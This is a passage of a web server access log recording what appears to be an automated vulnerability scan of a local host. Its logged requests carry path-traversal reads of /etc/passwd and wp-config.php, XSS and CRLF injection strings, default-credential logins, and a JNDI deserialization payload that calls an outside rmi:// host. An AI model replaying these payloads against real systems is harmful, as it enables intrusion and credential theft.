+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hue&password=hue&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v2/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?download=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proftpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RASHTML5Gateway/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie%3Acrlfinjection/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/app/something/services/AppModule.class/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/multimon.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authentication/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /icons/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\x22,\x0D\x0A \x22properties\x22:{\x0D\x0A \x22@type\x22:\x22java.util.Properties\x22,\x0D\x0A \x22UserTransaction\x22:\x22rmi://ca2u0eosmpv1jhs80ca09hpqssuu8se1c.oast.fun/Exploit\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hadoop&password=hadoop&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfwrepo.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about/../tree?action=get HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin-ng/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pureweb/server/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sqlite/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.082","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /comm.php?id=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/known_hosts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=cloudera&password=cloudera&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /overview.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) 